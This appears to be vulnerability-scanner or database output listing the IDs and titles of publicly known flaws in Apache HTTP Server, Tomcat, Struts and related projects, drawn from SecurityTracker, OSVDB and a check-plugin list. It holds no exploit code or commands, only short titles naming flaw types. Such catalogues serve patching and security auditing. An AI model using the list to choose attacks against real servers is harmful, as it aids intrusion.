| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
| [1024096] Apache mod_proxy_http May Return Results for a Different Request
| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
| [1008920] Apache mod_digest May Validate Replayed Client Responses
| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
| [1008030] Apache mod_rewrite Contains a Buffer Overflow
| [1008029] Apache mod_alias Contains a Buffer Overflow
| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
|
| OSVDB - http://www.osvdb.org:
| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
| [96077] Apache CloudStack Global Settings Multiple Field XSS
| [96076] Apache CloudStack Instances Menu Display Name Field XSS
| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
| [93172] Apache Camel camel/endpoints/ Endpoint XSS
| [93171] Apache Sling HtmlResponse Error Message XSS
| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
| [93168] Apache Click ErrorReport.java id Parameter XSS
| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
| [92270] Apache Tomcat Unspecified CSRF
| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
